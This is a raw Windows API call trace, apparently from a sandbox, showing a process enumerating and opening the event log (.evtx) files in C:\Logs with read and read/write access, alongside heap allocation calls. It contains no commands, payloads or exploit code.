1 [0071.454] AreFileApisANSI () returned 1 [0071.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpUsedDefaultChar=0x0) returned 87 [0071.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0071.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.454] AreFileApisANSI () returned 1 [0071.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0071.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81d68 [0071.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x81d68, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 87 [0071.454] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.460] GetFileType (hFile=0x428) returned 0x1 [0071.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0071.460] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.460] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.461] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.461] CloseHandle (hObject=0x428) returned 1 [0071.461] AreFileApisANSI () returned 1 [0071.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0071.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81638 [0071.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x81638, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 87 [0071.461] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.461] GetFileType (hFile=0x428) returned 0x1 [0071.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0071.461] CloseHandle (hObject=0x428) returned 1 [0071.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0071.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0071.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0071.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0071.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0071.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.463] AreFileApisANSI () returned 1 [0071.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x812a0 [0071.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x812a0, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 87 [0071.463] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.463] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x80a30 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.464] AreFileApisANSI () returned 1 [0071.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpUsedDefaultChar=0x0) returned 80 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0071.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.465] AreFileApisANSI () returned 1 [0071.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0071.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=80 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 80 [0071.465] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.466] GetFileType (hFile=0x428) returned 0x1 [0071.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.467] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.467] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.467] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.467] CloseHandle (hObject=0x428) returned 1 [0071.467] AreFileApisANSI () returned 1 [0071.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0071.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=80 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 80 [0071.467] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.467] GetFileType (hFile=0x428) returned 0x1 [0071.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.468] CloseHandle (hObject=0x428) returned 1 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x30c98 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x80a30 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x30c98 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x80a30 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.468] AreFileApisANSI () returned 1 [0071.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0071.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=80 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 80 [0071.468] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0071.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.469] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0071.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.470] AreFileApisANSI () returned 1 [0071.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpUsedDefaultChar=0x0) returned 54 [0071.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.470] 